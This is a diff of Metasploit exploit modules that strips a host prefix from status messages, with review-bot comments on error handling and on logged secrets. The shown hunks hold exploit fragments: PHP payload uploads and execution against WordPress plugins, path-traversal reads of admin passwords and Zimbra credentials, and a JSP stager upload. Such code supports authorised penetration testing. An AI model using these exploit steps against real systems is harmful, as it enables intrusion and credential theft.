@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote rescue JSON::ParserError fail_with(Failure::Unknown, 'Unable to parse JSON data for the filename') end - print_good("#{peer} - Our payload is at: #{new_php_pagename}. Calling payload...") + print_good("Our payload is at: #{new_php_pagename}. Calling payload...") register_files_for_cleanup(new_php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown,'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'contact_files', new_php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb index a0a6ac4c0e..2fc0fe33ca 100644 --- a/modules/exploits/unix/webapp/wp_optimizepress_upload.rb +++ b/modules/exploits/unix/webapp/wp_optimizepress_upload.rb @@ -64,7 +64,7 @@ class Metasploit3 < Msf::Exploit::Remote uri = normalize_uri(target_uri.path) #get upload filepath - print_status("#{peer} - Getting the upload path...") + print_status("Getting the upload path...") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'wp-content', 'themes', datastore['THEMEDIR'], 'lib', 'admin', 'media-upload.php') @@ -92,7 +92,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data.add_part("1", nil, nil, "form-data; name=\"newcsimg\"") post_data.add_part("#{file_path}", nil, nil, "form-data; name=\"imgpath\"") - print_status("#{peer} - Uploading PHP payload...") + print_status("Uploading PHP payload...") n_data = post_data.to_s 
@@ -111,7 +111,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to upload payload") end - print_good("#{peer} - Payload uploaded successfully. Disclosing the payload path...") + print_good("Payload uploaded successfully. Disclosing the payload path...") #get path to payload res = send_request_cgi({ 'method' => 'GET', @@ -138,7 +138,7 @@ class Metasploit3 < Msf::Exploit::Remote register_files_for_cleanup(File::basename(u.path)) - print_good("#{peer} - Our payload is at: #{u.path}! Executing payload...") + print_good("Our payload is at: #{u.path}! Executing payload...") send_request_cgi({ 'method' => 'GET', 'uri' => u.path diff --git a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb index 765e103f5a..cbc7e40b53 100644 --- a/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_photo_gallery_unrestricted_file_upload.rb @@ -72,17 +72,17 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Authenticating using #{username}:#{password}...") + print_status("Authenticating using #{username}:#{password}...") cookie = wordpress_login(username, password) fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil? - print_good("#{peer} - Authenticated with WordPress") + print_good("Authenticated with WordPress") - print_status("#{peer} - Preparing payload...") + print_status("Preparing payload...") payload_name = Rex::Text.rand_text_alpha(10) data = generate_mime_message(payload, payload_name) upload_dir = "#{Rex::Text.rand_text_alpha(5)}/" - print_status("#{peer} - Uploading payload to #{upload_dir}...") + print_status("Uploading payload to #{upload_dir}...") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, 
@@ -94,9 +94,9 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unreachable, 'No response from the target') if res.nil? fail_with(Failure::UnexpectedReply, "Server responded with status code #{res.code}") if res.code != 200 - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") - print_status("#{peer} - Parsing server response...") + print_status("Parsing server response...") begin json = JSON.parse(res.body) if json.nil? || json['files'].nil? || json['files'][0].nil? || json['files'][0]['name'].nil? @@ -105,17 +105,17 @@ class Metasploit3 < Msf::Exploit::Remote uploaded_name = json['files'][0]['name'][0..-5] php_file_name = "#{uploaded_name}.php" payload_url = normalize_uri(wordpress_url_backend, upload_dir, uploaded_name, php_file_name) - print_good("#{peer} - Parsed response") + print_good("Parsed response") register_files_for_cleanup(php_file_name) register_files_for_cleanup("../#{uploaded_name}.zip") - print_status("#{peer} - Executing the payload at #{payload_url}") + print_status("Executing the payload at #{payload_url}") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") end rescue fail_with(Failure::UnexpectedReply, 'Unable to parse the server response') diff --git a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb index 48bc1b3f85..00226d4e6b 100644 --- a/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb +++ b/modules/exploits/unix/webapp/wp_pixabay_images_upload.rb 
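Review bot: The bare `rescue` closing the `begin` block in the `@@ -105,17` hunk of wp_photo_gallery_unrestricted_file_upload.rb reports every StandardError as 'Unable to parse the server response'. The block also wraps `send_request_cgi` and the cleanup registration, not just `JSON.parse`. Narrow it to `rescue JSON::ParserError`, as wp_nmediawebsite_file_upload.rb in this patch already does, so that request errors are not mislabelled as parse failures. The `begin` opens in the preceding hunk, and a few lines between the two hunks are not shown.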
@@ -81,11 +81,11 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::NoTarget, "#{peer} - #{target_uri} does not seeem to be WordPress site") end - print_status("#{peer} - Starting up web service...") + print_status("Starting up web service...") start_service payload_uri = generate_payload_uri - vprint_status("#{peer} - Using URI #{payload_uri}") + vprint_status("Using URI #{payload_uri}") random_file_name = rand_text_alphanumeric(rand(5) + 5) post = { @@ -95,7 +95,7 @@ class Metasploit3 < Msf::Exploit::Remote 'q' => "#{'../' * datastore['DEPTH']}#{random_file_name}" } - print_status("#{peer} - Uploading payload #{random_file_name}...") + print_status("Uploading payload #{random_file_name}...") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend), @@ -110,7 +110,7 @@ class Metasploit3 < Msf::Exploit::Remote server_epoch_time = DateTime.strptime(res.headers['date'], '%a, %d %b %Y %H:%M:%S GMT').to_i - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") datastore['TRIES'].times do |i| payload_name = "#{random_file_name}_#{server_epoch_time + i}.php" res = call_payload(payload_name) @@ -124,7 +124,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = wordpress_and_online? unless res - vprint_error("#{peer} - It doesn't look like a WordPress site") + vprint_error("It doesn't look like a WordPress site") return Exploit::CheckCode::Unknown end diff --git a/modules/exploits/unix/webapp/wp_platform_exec.rb b/modules/exploits/unix/webapp/wp_platform_exec.rb index 18118ed20c..2321cede00 100644 --- a/modules/exploits/unix/webapp/wp_platform_exec.rb +++ b/modules/exploits/unix/webapp/wp_platform_exec.rb 
@@ -47,7 +47,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part('pagelines', nil, nil, 'form-data; name="page"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") send_request_cgi({ 'method' => 'POST', 'uri' => wordpress_url_admin_post, diff --git a/modules/exploits/unix/webapp/wp_property_upload_exec.rb b/modules/exploits/unix/webapp/wp_property_upload_exec.rb index 567ac81937..3e83952a77 100644 --- a/modules/exploits/unix/webapp/wp_property_upload_exec.rb +++ b/modules/exploits/unix/webapp/wp_property_upload_exec.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(data_uri, nil, nil, "form-data; name=\"folder\"") post_data = data.to_s - print_status("#{peer} - Uploading payload #{payload_name}") + print_status("Uploading payload #{payload_name}") res = send_request_cgi( 'method' => 'POST', 'uri' => request_uri, @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote upload_uri = normalize_uri(res.body) - print_status("#{peer} - Executing payload #{payload_name}") + print_status("Executing payload #{payload_name}") send_request_raw( 'uri' => upload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb index 363b9441a4..564aaead50 100644 --- a/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_reflexgallery_file_upload.rb @@ -67,7 +67,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /success|#{php_pagename}/ - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::Unknown, "#{peer} - Unable to deploy payload, server returned #{res.code}") 
@@ -76,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', "#{year}", "#{month}", php_pagename) ) diff --git a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb index 6ae240b2d9..5e229750e1 100644 --- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb +++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb @@ -77,8 +77,8 @@ class Metasploit3 < Msf::Exploit::Remote # This normally works register_files_for_cleanup('../revslider.zip') final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename) - print_good("#{peer} - Our payload is at: #{final_uri}") - print_status("#{peer} - Calling payload...") + print_good("Our payload is at: #{final_uri}") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(final_uri), 'timeout' => 5 diff --git a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb index b1f4e67ad4..830cb7cea6 100644 --- a/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb +++ b/modules/exploits/unix/webapp/wp_slideshowgallery_upload.rb @@ -60,14 +60,14 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") filename = "#{rand_text_alpha_lower(8)}.php" data = Rex::MIME::Message.new 
@@ -85,7 +85,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(payload.encoded, 'application/x-httpd-php', nil, "form-data; name=\"image_file\"; filename=\"#{filename}\"") post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(wordpress_url_backend, 'admin.php'), @@ -108,7 +108,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'Server did not respond in an expected way') end - print_status("#{peer} - Calling uploaded file #{filename}") + print_status("Calling uploaded file #{filename}") send_request_cgi( 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', 'slideshow-gallery', filename) ) diff --git a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb index f683aa071f..6b7a2c30b9 100644 --- a/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb +++ b/modules/exploits/unix/webapp/wp_symposium_shell_upload.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Preparing payload") + print_status("Preparing payload") unique_name = Rex::Text.rand_text_alpha(10) payload_name = "#{unique_name}.php" symposium_url = normalize_uri(wordpress_url_plugins, 'wp-symposium', 'server', 'php') @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote data = generate_mime_message(payload, payload_name, unique_name, symposium_url) symposium_url = normalize_uri(symposium_url, 'index.php') - print_status("#{peer} - Uploading payload to #{payload_url}") + print_status("Uploading payload to #{payload_url}") res = send_request_cgi( 'method' => 'POST', 'uri' => symposium_url, 
@@ -74,22 +74,22 @@ class Metasploit3 < Msf::Exploit::Remote ) if res && res.code == 200 && res.body.length > 0 && !res.body.include?('error') && res.body != '0' - print_good("#{peer} - Uploaded the payload") + print_good("Uploaded the payload") register_files_for_cleanup(payload_name) - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") send_request_cgi( { 'uri' => payload_url, 'method' => 'GET' }, 5) - print_good("#{peer} - Executed payload") + print_good("Executed payload") else if res.nil? fail_with(Failure::Unreachable, "No response from the target") else - vprint_error("#{peer} - HTTP Status: #{res.code}") - vprint_error("#{peer} - Server returned: #{res.body}") + vprint_error("HTTP Status: #{res.code}") + vprint_error("Server returned: #{res.body}") fail_with(Failure::UnexpectedReply, "Failed to upload the payload") end end diff --git a/modules/exploits/unix/webapp/wp_total_cache_exec.rb b/modules/exploits/unix/webapp/wp_total_cache_exec.rb index a38a65f0f1..bcf6911d2b 100644 --- a/modules/exploits/unix/webapp/wp_total_cache_exec.rb +++ b/modules/exploits/unix/webapp/wp_total_cache_exec.rb 
@@ -106,44 +106,44 @@ class Metasploit3 < Msf::Exploit::Remote @auth = require_auth? if @auth - print_status("#{peer} - Trying to login...") + print_status("Trying to login...") @cookie = wordpress_login(@user, @password) if @cookie.nil? fail_with(Failure::NoAccess, "#{peer} - Login wasn't successful") end - print_status("#{peer} - login successful") + print_status("login successful") else - print_status("#{peer} - Trying unauthenticated exploitation...") + print_status("Trying unauthenticated exploitation...") end if datastore['POSTID'] and datastore['POSTID'] != 0 @post_id = datastore['POSTID'] - print_status("#{peer} - Using the user supplied POST ID #{@post_id}...") + print_status("Using the user supplied POST ID #{@post_id}...") else - print_status("#{peer} - Trying to get posts from feed...") + print_status("Trying to get posts from feed...") all_posts = wordpress_get_all_blog_posts_via_feed # First try all blog posts provided by feed if all_posts all_posts.each do |p| - vprint_status("#{peer} - Checking #{p}...") + vprint_status("Checking #{p}...") enabled = wordpress_post_comments_enabled?(p, @cookie) @post_id = get_post_id_from_body(enabled) if @post_id - print_status("#{peer} - Found Post POST ID #{@post_id}...") + print_status("Found Post POST ID #{@post_id}...") break end end end # if nothing found, bruteforce a post id unless @post_id - print_status("#{peer} - Nothing found. Trying to brute force a valid POST ID...") + print_status("Nothing found. Trying to brute force a valid POST ID...") min_post_id = datastore['MIN_POST_ID'] max_post_id = datastore['MAX_POST_ID'] @post_id = wordpress_bruteforce_valid_post_id_with_comments_enabled(min_post_id, max_post_id, @cookie) if @post_id.nil? fail_with(Failure::BadConfig, "#{peer} - Unable to post without a valid POST ID where comment") else - print_status("#{peer} - Using the brute forced POST ID #{@post_id}...") + print_status("Using the brute forced POST ID #{@post_id}...") end end end 
@@ -151,14 +151,14 @@ class Metasploit3 < Msf::Exploit::Remote random_test = rand_text_alpha(64) @sum = Rex::Text.sha1(random_test) - print_status("#{peer} - Injecting the PHP Code in a comment...") + print_status("Injecting the PHP Code in a comment...") text = Rex::Text::rand_text_alpha(10) post_uri = post_comment(text) if post_uri.nil? fail_with(Failure::Unknown, "#{peer} - Expected redirection not returned") end - print_status("#{peer} - Executing the payload...") + print_status("Executing the payload...") options = { 'method' => 'GET', 'uri' => post_uri, diff --git a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb index cba67e8185..ff0f1b3644 100644 --- a/modules/exploits/unix/webapp/wp_worktheflow_upload.rb +++ b/modules/exploits/unix/webapp/wp_worktheflow_upload.rb @@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 - print_good("#{peer} - Our payload is at: #{php_pagename}. Calling payload...") + print_good("Our payload is at: #{php_pagename}. Calling payload...") register_files_for_cleanup(php_pagename) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, 'ERROR') end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( 'uri' => normalize_uri(wordpress_url_plugins, 'work-the-flow-file-upload', 'public', 'assets', 'jQuery-File-Upload-9.5.0', 'server', 'php', 'files', php_pagename) diff --git a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb index d51f8957e1..f4cd2947c3 100644 --- a/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb 
@@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 200 && res.body =~ /#{php_page_name}/ - print_good("#{peer} - Payload uploaded as #{php_page_name}") + print_good("Payload uploaded as #{php_page_name}") register_files_for_cleanup(php_page_name) else fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}") @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Server did not answer") end - print_status("#{peer} - Calling payload...") + print_status("Calling payload...") send_request_cgi( { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) }, 5 diff --git a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb index 5643f7fef8..b9077a1de7 100644 --- a/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb +++ b/modules/exploits/unix/webapp/wp_wptouch_file_upload.rb @@ -73,7 +73,7 @@ class Metasploit3 < Msf::Exploit::Remote # forward to profile.php or other page? if res && res.redirect? && res.redirection location = res.redirection - print_status("#{peer} - Following redirect to #{location}") + print_status("Following redirect to #{location}") res = send_request_cgi( 'uri' => location, 'method' => 'GET', @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote data.add_part(nonce, nil, nil, 'form-data; name="wp_nonce"') post_data = data.to_s - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_ajax, 
@@ -117,29 +117,29 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Trying to login as #{user}") + print_status("Trying to login as #{user}") cookie = wordpress_login(user, password) if cookie.nil? - print_error("#{peer} - Unable to login as #{user}") + print_error("Unable to login as #{user}") return end - print_status("#{peer} - Trying to get nonce") + print_status("Trying to get nonce") nonce = get_nonce(cookie) if nonce.nil? - print_error("#{peer} - Can not get nonce after login") + print_error("Can not get nonce after login") return end - print_status("#{peer} - Got nonce #{nonce}") + print_status("Got nonce #{nonce}") - print_status("#{peer} - Trying to upload payload") + print_status("Trying to upload payload") file_path = upload_file(cookie, nonce) if file_path.nil? - print_error("#{peer} - Error uploading file") + print_error("Error uploading file") return end - print_status("#{peer} - Calling uploaded file #{file_path}") + print_status("Calling uploaded file #{file_path}") send_request_cgi( 'uri' => file_path, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb index e48bbf5a9d..e12dd578c5 100644 --- a/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb +++ b/modules/exploits/unix/webapp/wp_wysija_newsletters_upload.rb @@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_uri = normalize_uri(target_uri.path, wp_content_dir, 'uploads', 'wysija', 'themes', theme_name, payload_name) - print_status("#{peer} - Uploading payload to #{payload_uri}") + print_status("Uploading payload to #{payload_uri}") res = send_request_cgi( 'method' => 'POST', 'uri' => wordpress_url_admin_post, 
@@ -108,9 +108,9 @@ class Metasploit3 < Msf::Exploit::Remote # the theme folder (manual cleanup) register_files_for_cleanup('style.css', payload_name) - print_warning("#{peer} - The theme folder #{theme_name} can not be removed. Please delete it manually.") + print_warning("The theme folder #{theme_name} can not be removed. Please delete it manually.") - print_status("#{peer} - Executing payload #{payload_uri}") + print_status("Executing payload #{payload_uri}") send_request_cgi( 'uri' => payload_uri, 'method' => 'GET' diff --git a/modules/exploits/unix/webapp/xoda_file_upload.rb b/modules/exploits/unix/webapp/xoda_file_upload.rb index 410ba14ceb..1a4f6f9ab5 100644 --- a/modules/exploits/unix/webapp/xoda_file_upload.rb +++ b/modules/exploits/unix/webapp/xoda_file_upload.rb @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote post_data << "\r\n" post_data << "--#{boundary}--\r\n" - print_status("#{peer} - Sending PHP payload (#{@payload_name})") + print_status("Sending PHP payload (#{@payload_name})") res = send_request_cgi({ 'method' => 'POST', 'uri' => "#{uri}?upload", @@ -110,11 +110,11 @@ class Metasploit3 < Msf::Exploit::Remote }) if not res or res.code != 302 - print_error("#{peer} - File wasn't uploaded, aborting!") + print_error("File wasn't uploaded, aborting!") return end - print_status("#{peer} - Executing PHP payload (#{@payload_name})") + print_status("Executing PHP payload (#{@payload_name})") # Execute our payload res = send_request_cgi({ @@ -125,7 +125,7 @@ class Metasploit3 < Msf::Exploit::Remote # If we don't get a 200 when we request our malicious payload, we suspect # we don't have a shell, either. Print the status code for debugging purposes. if res and res.code != 200 - print_status("#{peer} - Server returned #{res.code.to_s}") + print_status("Server returned #{res.code.to_s}") end end diff --git a/modules/exploits/unix/webapp/zeroshell_exec.rb b/modules/exploits/unix/webapp/zeroshell_exec.rb index 2fb30b494a..6af43f873a 100644 
--- a/modules/exploits/unix/webapp/zeroshell_exec.rb +++ b/modules/exploits/unix/webapp/zeroshell_exec.rb @@ -56,7 +56,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - print_status("#{peer} - Trying to detect ZeroShell") + print_status("Trying to detect ZeroShell") res = send_request_cgi({ 'method' => 'GET', @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote # Retrieve admin password using unauthenticated LFI def password rootpw = "../../../var/register/system/ldap/rootpw" - print_status("#{peer} - Retrieving cleartext admin password") + print_status("Retrieving cleartext admin password") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body !~ /not found/ res.body =~ /^(.*)$/ pass = $1 - print_status("#{peer} - Password retrieved [ #{pass} ]") + print_status("Password retrieved [ #{pass} ]") return pass else return nil @@ -101,7 +101,7 @@ class Metasploit3 < Msf::Exploit::Remote # Login using the retrieved password and grab the session key from the response body. def login(admin_password) - print_status("#{peer} - Log in and retrieving session key") + print_status("Log in and retrieving session key") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, "cgi-bin", "kerbynet"), @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote if res and res.code == 200 and res.body =~ /STk=([a-zA-Z0-9]+)&Action/ sessionkey = $1 - print_status("#{peer} - Session key retrieved [ #{sessionkey} ]") + print_status("Session key retrieved [ #{sessionkey} ]") return sessionkey else fail_with(Failure::Unknown, "#{peer} - Retrieving session key failed!") diff --git a/modules/exploits/unix/webapp/zimbra_lfi.rb b/modules/exploits/unix/webapp/zimbra_lfi.rb index c126de0f39..0cb88957e1 100644 --- a/modules/exploits/unix/webapp/zimbra_lfi.rb +++ b/modules/exploits/unix/webapp/zimbra_lfi.rb 
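Review bot: The `-91,7` hunk of zeroshell_exec.rb still writes the recovered admin password to the console at normal verbosity (`print_status("Password retrieved [ #{pass} ]")`), and the `-114,7` hunk does the same with the session key. Any spooled console output or saved engagement log then holds those secrets in cleartext. Since these lines are being rewritten anyway, I would keep the status line value-free, `print_status("Password retrieved")`, and move the value to `vprint_status`. The same applies to `print_good("Logged in as '#{datastore['USERNAME']}:#{datastore['PASSWORD']}'")` in the `-138,18` hunk of zpanel_username_exec.rb. The enclosing methods start or end outside these hunks.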
@@ -89,7 +89,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Getting login credentials...") + print_status("Getting login credentials...") res = send_traversal_query(traversal_path("conf/localconfig.xml")) unless res and res.code == 200 @@ -115,8 +115,8 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - Unable to get login credentials") end - print_good("#{peer} - Got login credentials!") - print_status("#{peer} - Getting auth token...") + print_good("Got login credentials!") + print_status("Getting auth token...") soap_req = build_soap_req(zimbra_user, zimbra_pass) #lets get our hands foamy @@ -142,7 +142,7 @@ class Metasploit3 < Msf::Exploit::Remote end @cookie = "ZM_ADMIN_AUTH_TOKEN=#{auth_token}" - print_good("#{peer} - Got auth token!") + print_good("Got auth token!") #the initial POC for this vuln shows user creation with admin rights for the web interface, thats cool but a shell is even cooler #the web interface has a function to upload the latest version of the desktop client via /service/extension/clientUploader/upload/ @@ -156,7 +156,7 @@ class Metasploit3 < Msf::Exploit::Remote payload_elf = generate_payload_exe #upload payload - print_status("#{peer} - Uploading payload") + print_status("Uploading payload") res = upload_file(payload_name, payload_elf) unless res and res.code == 200 @@ -164,7 +164,7 @@ class Metasploit3 < Msf::Exploit::Remote end #upload jsp stager - print_status("#{peer} - Uploading jsp stager") + print_status("Uploading jsp stager") res = upload_file(stager_name, stager) unless res and res.code == 200 @@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote "../jetty/webapps/zimbra/downloads/#{payload_name}" ) - print_status("#{peer} - Executing payload on /downloads/#{stager_name}") + print_status("Executing payload on /downloads/#{stager_name}") res = send_request_cgi({ 'uri' => normalize_uri("downloads", stager_name), 
diff --git a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb index 5add6e428a..8f26104b4e 100644 --- a/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb +++ b/modules/exploits/unix/webapp/zoneminder_packagecontrol_exec.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote data = "action=login&view=version&username=#{user}&password=#{pass}" # login and retrieve software version - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', @@ -81,7 +81,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 if res.body =~ /<title>ZM - Login<\/title>/ - vprint_error("#{peer} - Service found, but authentication failed") + vprint_error("Service found, but authentication failed") return Exploit::CheckCode::Detected elsif res.body =~ /v1.2(4\.\d+|5\.0)/ return Exploit::CheckCode::Appears @@ -90,7 +90,7 @@ class Metasploit3 < Msf::Exploit::Remote end end rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeoutp - vprint_error("#{peer} - Connection failed") + vprint_error("Connection failed") return Exploit::CheckCode::Unknown end return Exploit::CheckCode::Safe @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote command = Rex::Text.uri_encode(payload.encoded) # login - print_status("#{peer} - Authenticating as user '#{user}'") + print_status("Authenticating as user '#{user}'") begin res = send_request_cgi({ 'method' => 'POST', 
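Review bot: The rescue list in the `-90,7` hunk of zoneminder_packagecontrol_exec.rb names `::Rex::ConnectionTimeoutp`, which looks like a typo for `::Rex::ConnectionTimeout`; the `-121,10` hunk of the same file spells it without the trailing `p`. When a raised error is tested against that constant, Ruby will fail to resolve it and raise a `NameError`, so `check` never reaches `Exploit::CheckCode::Unknown`. The line should read `rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout`. The commit touches the line directly below it, so this is a good place to fix it.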
@@ -121,10 +121,10 @@ class Metasploit3 < Msf::Exploit::Remote rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout fail_with(Failure::Unreachable, "#{peer} - Connection failed") end - print_good("#{peer} - Authenticated successfully") + print_good("Authenticated successfully") # send payload - print_status("#{peer} - Sending payload (#{command.length} bytes)") + print_status("Sending payload (#{command.length} bytes)") begin res = send_request_cgi({ 'method' => 'POST', @@ -133,7 +133,7 @@ class Metasploit3 < Msf::Exploit::Remote 'cookie' => "#{cookie}" }) if res and res.code == 200 - print_good("#{peer} - Payload sent successfully") + print_good("Payload sent successfully") else fail_with(Failure::UnexpectedReply, "#{peer} - Sending payload failed") end diff --git a/modules/exploits/unix/webapp/zpanel_username_exec.rb b/modules/exploits/unix/webapp/zpanel_username_exec.rb index 5a398002a8..fa69d395d3 100644 --- a/modules/exploits/unix/webapp/zpanel_username_exec.rb +++ b/modules/exploits/unix/webapp/zpanel_username_exec.rb @@ -57,7 +57,7 @@ class Metasploit3 < Msf::Exploit::Remote def check res = send_request_raw({'uri' => normalize_uri(target_uri.path)}) if not res - vprint_error("#{peer} - Connection timed out") + vprint_error("Connection timed out") return Exploit::CheckCode::Unknown end 
